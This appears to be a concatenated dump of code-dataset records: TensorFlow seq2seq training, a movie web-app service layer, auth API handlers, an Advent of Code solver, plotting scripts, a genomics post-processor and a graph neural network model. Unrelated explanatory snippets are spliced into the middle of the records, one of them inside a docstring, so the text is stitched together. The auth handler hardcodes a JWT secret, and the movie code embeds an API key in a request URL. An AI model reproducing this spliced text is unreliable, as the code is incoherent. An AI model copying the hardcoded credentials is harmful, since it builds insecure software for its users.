tf.nn.dropout(trg_emb, KEEP_PROB)\n\n\t\t''' Encoder - use dynamic_rnn\n\t\t\tenc_outputs: [batch_size, max_time, HIDDEN_SIZE]\n\t\t\tenc_state: a tuple contains #NUM_LAYERS LSTMStateTuple classes. 
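CliParser.parse_args() in the harpoon executor above treats everything after a bare "--" as pass-through extras instead of parsing it. The splitting logic reduced to a standalone sketch:

def split_extras(argv):
    args, extras = [], None
    for token in argv:
        if extras is not None:
            extras.append(token)   # already past the bare "--"
        elif token == "--":
            extras = []            # start collecting pass-through args
        else:
            args.append(token)
    return args, extras or []

print(split_extras(["run", "--task", "build", "--", "-v", "--inner"]))
# (['run', '--task', 'build'], ['-v', '--inner'])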
dims: [batch_size, state_size]\n\t\t'''\n\t\twith tf.variable_scope(\"encoder\"):\n\t\t\tenc_outputs, enc_state = tf.nn.dynamic_rnn(self.enc_cell, src_emb, src_size, dtype = tf.float32)\n\n\t\t''' Decoder - use dynamic_rnn\n\t\t\tdec_outputs: [batch_size, max_time, HIDDEN_SIZE]\n\t\t'''\t\n\t\twith tf.variable_scope(\"decoder\"):\n\t\t\tdec_outputs, _ = tf.nn.dynamic_rnn(self.dec_cell, trg_emb, trg_size, initial_state = enc_state)\n\n\t\t''' Compute log perplexity each time step\n\t\t''' \n\t\toutput = tf.reshape(dec_outputs, [-1, HIDDEN_SIZE])\n\t\tlogits = tf.matmul(output, self.softmax_weight) + self.softmax_bias\n\t\tloss = tf.nn.sparse_softmax_cross_entropy_with_logits(labels = tf.reshape(trg_label, [-1]), logits = logits)\n\n\t\t# When compute the avg cost\n\t\t# set the padding position weight be 0\n\t\tlabel_weights = tf.sequence_mask(trg_size, maxlen = tf.shape(trg_label)[1], dtype = tf.float32)\n\t\tlabel_weights = tf.reshape(label_weights, [-1])\n\t\tcost = tf.reduce_sum(loss * label_weights)\n\t\tcost_per_token = cost / tf.reduce_sum(label_weights)\n\n\t\t''' Define BP\n\t\t'''\n\t\ttrainable_variables = tf.trainable_variables()\n\t\t# control grads; define opt; define train_op\n\t\tgrads = tf.gradients(cost / tf.to_float(batch_size), trainable_variables)\n\t\tgrads, _ = tf.clip_by_global_norm(grads, MAX_GRAD_NORM)\n\t\toptimizer = tf.train.GradientDescentOptimizer(learning_rate = 1.0)\n\t\ttrain_op = optimizer.apply_gradients(zip(grads, trainable_variables))\n\t\treturn cost_per_token, train_op\n\n''' Train an epoch and return global steps\n\tsave a checkpoint every 200 steps\n''' \ndef run_epoch(session, cost_op, train_op, saver, step):\n\twhile True:\n\t\ttry:\n\t\t\tcost, _ = session.run([cost_op, train_op])\n\t\t\tif step % 10 == 0:\n\t\t\t\tprint(\"After %d steps, per token cost is %.3f\" % (step, cost))\n\t\t\tif step % 200 == 0:\n\t\t\t\tsaver.save(session, CHECKPOINT_PATH, global_step = step)\n\t\t\tstep += 1\n\t\texcept tf.errors.OutOfRangeError:\n\t\t\tbreak\n\treturn step\n\ndef main():\n\tinitializer = tf.random_uniform_initializer(-0.05, 0.05)\n\n\t''' Define the training model\n\t''' \n\twith tf.variable_scope(\"nmt_model\", reuse = None, initializer = initializer):\n\t\ttrain_model = NMTModel()\n\t''' Define the input data\n\t''' \n\tdata = MakeSrcTrgDataset(SRC_TRAIN_DATA, TRG_TRAIN_DATA, BATCH_SIZE)\n\titerator = data.make_initializable_iterator()\n\t(src, src_size), (trg_input, trg_label, trg_size) = iterator.get_next()\n\n\t# Define forward compute graph\n\tcost_op, train_op = train_model.forward(src, src_size, trg_input, trg_label, trg_size)\n\n\t# Train model\n\tsaver = tf.train.Saver()\n\tstep = 0\n\twith tf.Session() as sess:\n\t\ttf.global_variables_initializer().run()\n\t\tfor i in range(NUM_EPOCH):\n\t\t\tprint(\"In iteration: %d\" % (i + 1))\n\t\t\tsess.run(iterator.initializer)\n\t\t\tstep = run_epoch(sess, cost_op, train_op, saver, step)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"seq2seq/model/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"650633521","text":"from typing import List, Iterable\nimport requests\nfrom flix.adapters.repository import AbstractRepository\nfrom flix.domain.model import Movie, Actor, User, Review, Director, Genre, Comment, make_genre_association, make_comment\n\n\nclass NonExistentMovieException(Exception):\n pass\n\n\nclass UnknownUserException(Exception):\n pass\n\n\ndef 
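The padded-loss bookkeeping in train.py (tf.sequence_mask, a weighted sum, then dividing by the real token count) reduces to simple arithmetic; the same computation with plain numpy on a hypothetical batch of two sequences:

import numpy as np

loss = np.array([[0.5, 0.2, 0.9, 0.4],
                 [0.3, 0.7, 0.1, 0.8]])           # per-token cross-entropy
lengths = np.array([4, 2])                         # real target lengths
mask = (np.arange(4)[None, :] < lengths[:, None]).astype(float)
cost_per_token = (loss * mask).sum() / mask.sum()  # padding contributes nothing
print(round(cost_per_token, 3))  # 0.5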
add_comment(movie_rank: int, comment_text: str, username: str, repo: AbstractRepository):\n # Check that the movie exists.\n movie = repo.get_movie(movie_rank)\n if movie is None:\n raise NonExistentMovieException\n\n user = repo.get_user(username)\n if user is None:\n user = User(\"Guest account\", \"Abcd1234\")\n\n # Create comment.\n comment = make_comment(comment_text, user, movie)\n\n # Update the repository.\n repo.add_comment(comment)\n\n\ndef get_movie(movie_rank: int, repo: AbstractRepository):\n movie = repo.get_movie(movie_rank)\n\n if movie is None:\n raise NonExistentMovieException\n\n return movie_to_dict(movie, repo)\n\n\ndef get_first_movie(repo: AbstractRepository):\n\n movie = repo.get_first_movie()\n\n return movie_to_dict(movie, repo)\n\n\ndef get_last_movie(repo: AbstractRepository):\n\n movie = repo.get_last_movie()\n return movie_to_dict(movie, repo)\n\n\ndef get_movies_by_year(date, repo: AbstractRepository):\n # Returns movies for the target date (empty if no matches), the date of the previous movie (might be null), the date of the next movie (might be null)\n\n movies = repo.get_movies_by_year(target_year=date)\n\n movies_dto = list()\n prev_year = next_year = None\n\n if len(movies) > 0:\n prev_year = repo.get_year_of_previous_movie(movies[0])\n next_year = repo.get_year_of_next_movie(movies[0])\n\n # Convert Movies to dictionary form.\n movies_dto = movies_to_dict(movies, repo)\n\n return movies_dto, prev_year, next_year\n\n\ndef get_movie_ranks_for_genre(genre_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_genre(genre_name)\n\n return movie_ranks\n\ndef get_movie_ranks_for_actor(actor_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_actor(actor_name)\n\n return movie_ranks\n\ndef get_movie_ranks_for_director(director_name, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_director(director_name)\n\n return movie_ranks\n\n\ndef get_movie_ranks_for_year(tgt_year, repo: AbstractRepository):\n movie_ranks = repo.get_movie_ranks_for_year(tgt_year)\n\n return movie_ranks\n\n\ndef get_movies_by_rank(rank_list, repo: AbstractRepository):\n movies = repo.get_movies_by_rank(rank_list)\n\n # Convert Movies to dictionary form.\n movies_as_dict = movies_to_dict(movies, repo)\n\n return movies_as_dict\n\n\ndef get_comments_for_movie(movie_rank, repo: AbstractRepository):\n movie = repo.get_movie(movie_rank)\n\n if movie is None:\n raise NonExistentMovieException\n\n return comments_to_dict(movie.comments)\n\n\n# ============================================\n# Functions to convert model entities to dicts\n# ============================================\n\ndef movie_to_dict(movie: Movie, repo: AbstractRepository):\n '''actors = movie.actors[0]\n for i in movie.actors[1:]:\n actors += \",\"\n actors += str(i)'''\n actors = movie.actors\n\n movie_detail = requests.get(f\"http://omdbapi.com?t={movie.title}&apikey=47f211b2\").text\n #print(movie_detail)\n try:\n img_link = movie_detail.split('\",\"')[13].split('\":\"')[1]\n except:\n img_link = \"static/movie.png\"\n movie.image_hyperlink = img_link\n try:\n d = movie.director.director_full_name\n director = movie.director\n except:\n director = Director(movie.director)\n try:\n genres = movie.genres.split(',')\n except:\n genres = movie.genres\n\n movie_dict = {\n 'rank': movie.rank,\n 'date': movie.date,\n 'title': movie.title,\n 'first_para': movie.description,\n 'hyperlink': movie.hyperlink,\n 'image_hyperlink': movie.image_hyperlink,\n 'comments': 
comments_to_dict(movie.comments),\n 'genres': genres_to_dict(genres, repo),\n 'rating': movie.rating,\n 'votes': movie.votes,\n 'metascore': movie.metascore,\n 'director': director,\n 'actors': actors,\n 'runtime_minutes': movie.runtime_minutes,\n 'revenue': movie.revenue\n }\n return movie_dict\n\n\ndef movies_to_dict(movies: Iterable[Movie], repo:AbstractRepository):\n return [movie_to_dict(movie, repo) for movie in movies]\n\n\ndef comment_to_dict(comment: Comment):\n comment_dict = {\n 'username': comment.user.username,\n 'movie_rank': comment.movie.rank,\n 'comment_text': comment.comment,\n 'timestamp': comment.timestamp\n }\n return comment_dict\n\n\ndef comments_to_dict(comments: Iterable[Comment]):\n return [comment_to_dict(comment) for comment in comments]\n\n\ndef genre_to_dict(genre: Genre, repo: AbstractRepository):\n genre_dict = {\n 'name': genre,\n 'genre_asso_movies': [movie.rank for movie in repo.get_movies() if genre in movie.genres]\n }\n return genre_dict\n\ndef director_to_dict(director: Director):\n director_dict = {\n 'name': director.director_full_name,\n 'director_asso_movies': [movie.rank for movie in director.director_asso_movies]\n }\n return director_dict\n\ndef actor_to_dict(actor: Actor):\n actor_dict = {\n 'name': actor,\n 'actor_asso_movies': [movie.rank for movie in actor.actor_asso_movies]\n }\n return actor_dict\n\n\ndef genres_to_dict(genres: Iterable[Genre], repo:AbstractRepository):\n return [genre_to_dict(genre, repo) for genre in genres]\n\ndef directors_to_dict(directors: Iterable[Director]):\n return [director_to_dict(director) for director in directors]\n\ndef actors_to_dict(actors: Iterable[Actor]):\n return [actor_to_dict(actor) for actor in actors]\n\n# ============================================\n# Functions to convert dicts to model entities\n# ============================================\n\ndef dict_to_movie(dict):\n movie = Movie(dict.rank, dict.date, dict.title, dict.first_para, dict.hyperlink)\n # Note there's no comments or genres.\n return movie\n\ndef set_rating(movie_id: int, rating: int, username: str, repo: AbstractRepository):\n user = repo.get_user(username)\n if user is None:\n user = User('Guest account', 'defaultpass')\n\n movie = repo.get_movie(movie_id)\n if movie is None:\n raise NonExistentMovieException\n\n repo.set_rating(rating, user, movie)\n\n","sub_path":"flix/feed/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"463930258","text":"\"\"\"Authorization handlers\"\"\"\n\n# Copyright (c) Jupyter Development Team.\n# Distributed under the terms of the Modified BSD License.\n\nimport json\nfrom urllib.parse import quote\n\nfrom tornado import web\nfrom .. 
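movie_to_dict() above pulls the poster URL out of the raw OMDb response text by splitting at fixed offsets, which is what forces the bare except. A hedged alternative sketch that lets requests encode the query and parse the JSON (same public endpoint; the API key here is a placeholder):

import requests

def fetch_poster(title, api_key="YOUR_KEY"):
    resp = requests.get("http://omdbapi.com/", params={"t": title, "apikey": api_key})
    data = resp.json()
    # .get() covers missing fields instead of catching an IndexError
    return data.get("Poster", "static/movie.png")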
import orm\nfrom ..utils import token_authenticated\nfrom .base import APIHandler\n\nimport jwt\n\n\nclass TokenAPIHandler(APIHandler):\n @token_authenticated\n def get(self, token):\n orm_token = orm.APIToken.find(self.db, token)\n if orm_token is None:\n raise web.HTTPError(404)\n self.write(json.dumps(self.user_model(self.users[orm_token.user])))\n\n\nclass CookieAPIHandler(APIHandler):\n @token_authenticated\n def get(self, cookie_name, cookie_value=None):\n cookie_name = quote(cookie_name, safe='')\n if cookie_value is None:\n self.log.warn(\"Cookie values in request body is deprecated, use `/cookie_name/cookie_value`\")\n cookie_value = self.request.body\n else:\n cookie_value = cookie_value.encode('utf8')\n user = self._user_for_cookie(cookie_name, cookie_value)\n if user is None:\n raise web.HTTPError(404)\n self.write(json.dumps(self.user_model(user)))\n\n\nclass JWTAPIHandler(APIHandler):\n SECRET = 'my secret'\n @token_authenticated\n def get(self):\n header = self.request.headers.get('Authorization', '')\n header = header.strip()\n if header:\n split_header = header.split(' ')\n if len(split_header) == 2 and split_header[0] == 'Bearer' and split_header[1]:\n try:\n decoded_token = jwt.decode(split_header[1], self.SECRET, options={'verify_iat': False})\n user = self._user_from_orm(decoded_token['sub'])\n if user is None:\n raise web.HTTPError(404)\n else:\n self.write(json.dumps(self.user_model(user)))\n except Exception:\n raise web.HTTPError(401)\n\n\ndefault_handlers = [\n (r\"/api/authorizations/cookie/([^/]+)(?:/([^/]+))?\", CookieAPIHandler),\n (r\"/api/authorizations/token/([^/]+)\", TokenAPIHandler),\n (r\"/api/authorizations/jwt\", JWTAPIHandler)\n]\n","sub_path":"jupyterhub/apihandlers/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"364274528","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\n\n\nclass DatasetProducer(object):\n def __init__(self, batch_size, num_steps):\n self.batch_size = batch_size\n self.num_steps = num_steps\n\n def producer(self):\n data_path = '../data/399300.csv'\n data = pd.read_csv(data_path, encoding='GBK')\n\n data = data['涨跌幅'][-2::-1].values.astype(np.float32)\n\n train_data = dict()\n train_data['features'] = np.reshape(data[:3300], (33, self.num_steps, 1))\n train_data['labels'] = np.reshape(data[1:3301], (33, self.num_steps, 1))\n\n test_data = dict()\n test_data['features'] = np.reshape(data[3323:-1], (self.batch_size, self.num_steps, 1))\n test_data['labels'] = np.reshape(data[3324:], (self.batch_size, self.num_steps, 1))\n\n train_dataset = tf.contrib.data.Dataset.from_tensor_slices(train_data)\n test_dataset = tf.contrib.data.Dataset.from_tensor_slices(test_data).batch(self.batch_size)\n\n train_dataset = train_dataset.shuffle(10).batch(self.batch_size).repeat()\n\n return train_dataset, test_dataset\n","sub_path":"reader/dataset_producer.py","file_name":"dataset_producer.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"108656889","text":"with open(\"14-input.txt\", \"r\") as f:\n lines = f.readlines()\n\ntotal = 0\nused_addresses = []\nlines.reverse()\nnew_lines = []\n\n# remove duplicate registers so that only the latter are used\nfor line in lines:\n if line.split()[0] == \"mask\":\n new_lines.append(line)\n else:\n address = (line[line.find(\"[\") + 
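A standalone sketch of the PyJWT round trip that JWTAPIHandler depends on: encode a token carrying a sub claim, then decode it with the shared secret. Recent PyJWT versions also require an explicit algorithms list on decode:

import jwt

SECRET = "my secret"
token = jwt.encode({"sub": "some-user"}, SECRET, algorithm="HS256")
claims = jwt.decode(token, SECRET, algorithms=["HS256"])
print(claims["sub"])  # some-user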
1:line.find(\"]\")])\n if address not in used_addresses:\n used_addresses.append(address)\n new_lines.append(line)\n\nnew_lines.reverse()\n\nfor line in new_lines:\n if line.split()[0] == \"mask\":\n mask = line.split()[-1]\n mask = \"\".join(reversed(mask))\n else:\n value = int(line.split()[-1])\n reversed_binary_value = \"\".join(reversed(bin(value)[2:]))\n used_addresses.append(address)\n for i in range(len(mask)):\n if mask[i] == \"X\":\n continue\n if i >= len(reversed_binary_value):\n if mask[i] == \"1\":\n value += 2 ** i\n elif mask[i] != reversed_binary_value[i]:\n if mask[i] == \"1\":\n value += 2 ** i\n else:\n value -= 2 ** i\n total += value\n\nprint(total)\n","sub_path":"14-1.py","file_name":"14-1.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"418963157","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 13 10:57:53 2020\n\n@author: jaydeep\n\"\"\"\nimport pandas as pd\nimport csv\nimport numpy as np\nfrom collections import defaultdict\nfrom matplotlib import pyplot as plt\n\nfiles = [\n# \"61883_ioallocatecomplete_1.bpl.bpl\",\n# \"ppa3x_nsremovelockmnremove_0.bpl.bpl\",\n# \"mp_iobuildfsdirpsignaleventincompletiontimeout_0.bpl.bpl\",\n \"sbp2port_irqldispatch_1.bpl.bpl\"\n# \"flpydisk_irqlexapclte1_1.bpl.bpl\"\n ]\n\nprint(files)\n\nfolders = [\"OR\",\"UW\",\"alpha10\",\"alpha50\",\"alpha90\",\"Union\",\"Intersection\"]\nfolders = [\"OR\",\"AlphaDecay0.055_2\"]\nqueryType = [\"ORQ\",\"UWQ\"]\n\n\n\n''' \nFile Wise z3 Query OR/UW\nUPDATE MAX VALUE\n'''\nmaxValue = 99999\nfor file in files:\n for folder in folders: \n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n yQueryTimeOR = []\n yQueryTimeUW = []\n xOR = []\n xUW = []\n data = open(mem_file,'r')\n index = 0\n for line in data:\n arr = line.split(',')[:-1]\n mode = -1;\n for item in arr:\n if mode == -1:\n if \"UWQ\" in item:\n mode = 1\n elif \"ORQ\" in item:\n mode = 2\n else:\n index = index + 1\n if mode == 1:\n try:\n time = float(item)\n if time > maxValue:\n yQueryTimeUW.append(maxValue)\n xUW.append(index)\n else:\n yQueryTimeUW.append(time)\n xUW.append(index)\n except:\n continue\n elif mode == 2:\n try:\n time = float(item) \n if time > maxValue:\n yQueryTimeOR.append(maxValue)\n xOR.append(index)\n else:\n yQueryTimeOR.append(time)\n xOR.append(index)\n except:\n continue\n mode = -1\n plt.plot(xOR, yQueryTimeOR, label = \"ORQ \" + folder)\n plt.plot(xUW, yQueryTimeUW, label = \"UWQ \" + folder)\n plt.xlabel('Iterations')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_z3QueryTime.png\",dpi=200)\n \n''' \nFile Wise Inlined callsites UW/OR \n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yInlinedCallsitesOR = []\n yInlinedCallsitesUW = []\n xOR = []\n xUW = []\n index = 0\n data = open(mem_file,'r')\n for line in data:\n arr = line.split(',')\n mode = -1;\n try:\n sites = int(arr[-1])\n index = index + 1\n if \"ORQ\" in arr[-3]:\n yInlinedCallsitesOR.append(sites)\n xOR.append(index)\n elif \"UWQ\" in arr[-3]:\n yInlinedCallsitesUW.append(sites)\n xUW.append(index)\n except:\n continue\n plt.plot(xOR, yInlinedCallsitesOR, label = \"OR Inlined \" + folder)\n plt.plot(xUW, yInlinedCallsitesUW, label = \"UW Inlined \" + folder)\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n 
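14-1.py above applies the mask bit by bit with additions and subtractions; the usual closed form is two integer masks, OR-ing in the forced ones and AND-ing out the forced zeros. Checked against the well-known day-14 example values:

mask = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X"
or_mask = int(mask.replace("X", "0"), 2)   # forces the 1 bits on
and_mask = int(mask.replace("X", "1"), 2)  # forces the 0 bits off
value = 11
print((value | or_mask) & and_mask)  # 73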
plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_inlinedCallsites.png\",dpi=200)\n\n'''\n\n\n''' \n#File Wise z3 Query OR/UW in single file\n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yQueryTimeOR = []\n yQueryTimeUW = []\n data = open(mem_file,'r')\n for line in data:\n arr = line.split(',')[:-1]\n mode = -1;\n for item in arr:\n if mode == -1:\n if \"UWQ\" in item:\n mode = 1\n elif \"ORQ\" in item:\n mode = 2\n else:\n if mode == 1:\n try:\n yQueryTimeUW.append(float(item))\n except:\n continue\n elif mode == 2:\n try:\n yQueryTimeOR.append(float(item))\n except:\n continue\n mode = -1\n xOR = [i for i in range(0, len(yQueryTimeOR))]\n xUW = [i for i in range(0, len(yQueryTimeUW))]\n plt.plot(xOR, yQueryTimeOR, label = \"ORQ\")\n plt.plot(xUW, yQueryTimeUW, label = \"UWQ\")\n plt.xlabel('Time')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_z3QueryTime.png\",dpi=200)\n\n''' \n#File Wise z3 Query \n'''\nfor file in files:\n _ = plt.figure()\n for folder in folders:\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n data = open(mem_file,'r')\n idx = 0\n for line in data:\n arr = line.split(',')[:-1]\n for item in arr:\n try:\n time = float(item)\n maxValue = 10\n if time > maxValue:\n y.append(maxValue)\n else:\n y.append(time)\n except:\n continue\n x = [i for i in range(0, len(y))]\n plt.plot(x, y, label = folder)\n plt.xlabel('Time')\n plt.ylabel('z3 Query Time (sec)')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_z3QueryTime.png\",dpi=200)\n\n''' \n#File Wise Inlined callsites UW/OR in single file\n'''\n\nfor file in files:\n for folder in folders:\n _ = plt.figure()\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n yInlinedCallsitesOR = []\n yInlinedCallsitesUW = []\n data = open(mem_file,'r')\n itr = 0\n for line in data:\n arr = line.split(',')\n itr = itr + 1\n mode = -1;\n try:\n if \"ORQ\" in arr[-3]:\n yInlinedCallsitesOR.append(int(arr[-1]))\n elif \"UWQ\" in arr[-3]:\n yInlinedCallsitesUW.append(int(arr[-1]))\n except:\n continue\n xOR = [i for i in range(0, len(yInlinedCallsitesOR))]\n xUW = [i for i in range(0, len(yInlinedCallsitesUW))]\n plt.plot(xOR, yInlinedCallsitesOR, label = \"OR Inlined\")\n plt.plot(xUW, yInlinedCallsitesUW, label = \"UW Inlined\")\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_\" + folder + \"_inlinedCallsites.png\",dpi=200)\n\n''' \n#File Wise Inlined callsites\n'''\nfor file in files:\n _ = plt.figure()\n for folder in folders:\n mem_file = folder + \"/\" + file + \"_stats.txt\"\n y = []\n data = open(mem_file,'r')\n idx = 0\n for line in data:\n try:\n y.append(float(line.split(',')[-1]))\n except:\n continue\n x = [i for i in range(0, len(y))]\n plt.plot(x, y, label = folder)\n plt.xlabel('Iterations')\n plt.ylabel('Number of inlined callsites')\n plt.legend()\n plt.title(file)\n plt.savefig(file + \"_inlinedCallsites.png\",dpi=200)\n\n\n'''","sub_path":"alphadecay/Run9_AlphaGood_stats/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"623960034","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nroot=Tk()\nroot.title(\"Learn to 
code\")\nroot.iconbitmap('f:iron.ico')\nroot.geometry(\"400x200\")\n\ndef graph():\n house_prices=np.random.normal(200000,25000,5000)\n plt.pie(house_prices)\n plt.show()\n\nb=Button(root,text=\"Graph it\",command=graph)\nb.pack()\n\n\n\n\n\n\n\nroot.mainloop()","sub_path":"plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69017722","text":"from com.harrison.pubsub.example.PubSubImpl import PubSubImpl\nfrom com.harrison.pubsub.example.StringData import StringData\n\ntest1 = PubSubImpl(\"test 1\")\n\nabc = \"Hello World\"\n\ntest2 = PubSubImpl(\"test 2\")\n\ntest1.subscribe(str)\ntest2.subscribe(abc)\n\nsd = StringData(\"This is some data\")\n\ntest1.subscribe(StringData)\ntest2.subscribe(sd)\n\ntest1.publish(abc)\ntest2.publish(sd)\n","sub_path":"com/harrison/pubsub/example/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"579120972","text":"import os\nimport sys\nimport subprocess\nsys.path.append(snakemake.config['args']['mcc_path'])\nimport scripts.mccutils as mccutils\nimport config.retroseq.retroseq_post as config\n\n\ndef main():\n mccutils.log(\"retroseq\",\"processing RetroSeq results\")\n retroseq_out = snakemake.input.retroseq_out\n\n out_dir = snakemake.params.out_dir\n ref_name = snakemake.params.ref_name\n sample_name = snakemake.params.sample_name\n chromosomes = snakemake.params.chromosomes.split(\",\")\n\n insertions = read_insertions(retroseq_out, sample_name, chromosomes, support_threshold=config.READ_SUPPORT_THRESHOLD, breakpoint_threshold=config.BREAKPOINT_CONFIDENCE_THRESHOLD)\n if len(insertions) >= 1:\n insertions = mccutils.make_redundant_bed(insertions, sample_name, out_dir, method=\"retroseq\")\n mccutils.make_nonredundant_bed(insertions, sample_name, out_dir, method=\"retroseq\")\n else:\n mccutils.run_command([\"touch\",out_dir+\"/\"+sample_name+\"_retroseq_redundant.bed\"])\n mccutils.run_command([\"touch\",out_dir+\"/\"+sample_name+\"_retroseq_nonredundant.bed\"])\n mccutils.log(\"retroseq\",\"RetroSeq post processing complete\")\n\ndef read_insertions(retroseq_vcf, sample_name, chromosomes, support_threshold=0, breakpoint_threshold=6):\n insertions = []\n\n with open(retroseq_vcf, \"r\") as vcf:\n for line in vcf:\n if \"#\" not in line:\n insert = mccutils.Insertion()\n line = line.replace(\":\",\"\\t\")\n line = line.replace(\"=\", \"\\t\")\n line = line.replace(\",\", \"\\t\")\n split_line = line.split(\"\\t\")\n insert.chromosome = split_line[0]\n insert.start = int(split_line[10])\n insert.end = int(split_line[11])\n insert.retroseq.read_support = int(split_line[6])\n insert.type = \"non-reference\"\n insert.name = split_line[9]+\"_non-reference_\"+sample_name+\"_retroseq_rp_\"\n insert.retroseq.breakpoint_confidence = int(split_line[22])\n\n if insert.retroseq.read_support >= support_threshold and insert.retroseq.breakpoint_confidence >= breakpoint_threshold and insert.chromosome in chromosomes:\n insertions.append(insert)\n \n return insertions\n\n\nif __name__ == \"__main__\": \n main()","sub_path":"scripts/retroseq/retroseq_post.py","file_name":"retroseq_post.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189442538","text":"from models.HGSL.layers import *\nimport torch.nn as nn\n\n\nclass 
HGSL(nn.Module):\n \"\"\"\n Decode neighbors of input graph.\n \"\"\"\n\n def __init__(self, args, nfeat, nclass, dev):\n super(HGSL, self).__init__()\n # self.GCN = GCN_Backup(nfeat, args.num_hidden, nclass, dropout=args.dropout)\n self.GCN = GCN(nfeat, args.num_hidden, nclass, dropout=args.dropout)\n self.GenAdjLayer = HGSL_AdjGenerator(nfeat, args.num_hidden, args.num_head, args.epsilon, dev)\n self.lambda_ = args.lambda_\n self.eta = args.eta\n\n def forward(self, x, h, adj_ori, adj_feat, mode, norm_graph_reg_loss):\n \"\"\"\n\n Args:\n x: input feature\n h: embedding\n adj_ori: adj of graph\n adj_feat: adj generated by feature\n mode: gen adj using 'feat' or 'emb'\n Returns:\n logits: predicted labels\n h: embedding generated by GCN\n adj_sim:\n adj_agg:\n\n \"\"\"\n # ! Generate adj\n if mode == 'feat':\n adj_sim = self.GenAdjLayer(x, mode='feat')\n if norm_graph_reg_loss > 0:\n adj_sim = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_sim\n else:\n adj_agg = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_agg\n elif mode == 'emb':\n adj_sim = self.GenAdjLayer(h, mode='emb')\n if norm_graph_reg_loss > 0:\n adj_sim = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_sim\n else:\n adj_agg = F.normalize(adj_sim, dim=1, p=1) # Row normalization\n adj_agg = self.lambda_ * adj_ori + (1 - self.lambda_) * adj_agg\n # combine feat and emb sim mat\n adj_agg = self.eta * adj_agg + (1 - self.eta) * adj_feat\n\n # ! Aggregate using adj_agg\n logits, h = self.GCN(x, adj_agg)\n return logits, h, adj_sim, adj_agg\n\n\nclass GCN(nn.Module):\n def __init__(self, nfeat, nhid, nclass, dropout):\n super(GCN, self).__init__()\n self.gc1 = GraphConvolution(nfeat, nhid)\n self.gc2 = GraphConvolution(nhid, nclass)\n self.dropout = dropout\n\n def forward(self, x, adj):\n x = F.relu(self.gc1(x, adj))\n emb = x.detach()\n x = F.dropout(x, self.dropout, training=self.training)\n x = self.gc2(x, adj)\n return F.log_softmax(x, dim=1), emb\n","sub_path":"src/models/HGSL/HGSL.py","file_name":"HGSL.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"465842313","text":"\"\"\"\n\nBeta Distribution\n\n__author__ : 'vikas_rtr'\n__date__ : June 2015\n\n\"\"\"\n\nimport numpy as np\nfrom numpy import (exp, sqrt, pi)\nfrom scipy.special import gamma\n\nimport matplotlib.pyplot as plt\n\n\nclass beta_dist():\n\n \"\"\"Beta Distribution\n\n Interval : [0,1]\n loc = alpha = a\n scale = beta = b\n\n pdf = (gamma(a+b)* (x**(a-1))*((1-x)**(b-1)))/(gamma(a)*gamma(b))\n \"\"\"\n\n def __init__(self, loc=0, scale=1):\n self.a = loc\n self.b = scale\n\n def pdf(self, x):\n return (gamma(self.a + self.b) * (x ** (self.a - 1)) * ((1 - x) ** (self.b - 1))) / (gamma(self.a) * gamma(self.b))\n\nbta1 = beta_dist(loc=0.5, scale=0.5)\nbta2 = beta_dist(loc=5.0, scale=1.0)\nbta3 = beta_dist(loc=1.0, scale=3.0)\nbta4 = beta_dist(loc=2.0, scale=2.0)\nbta5 = 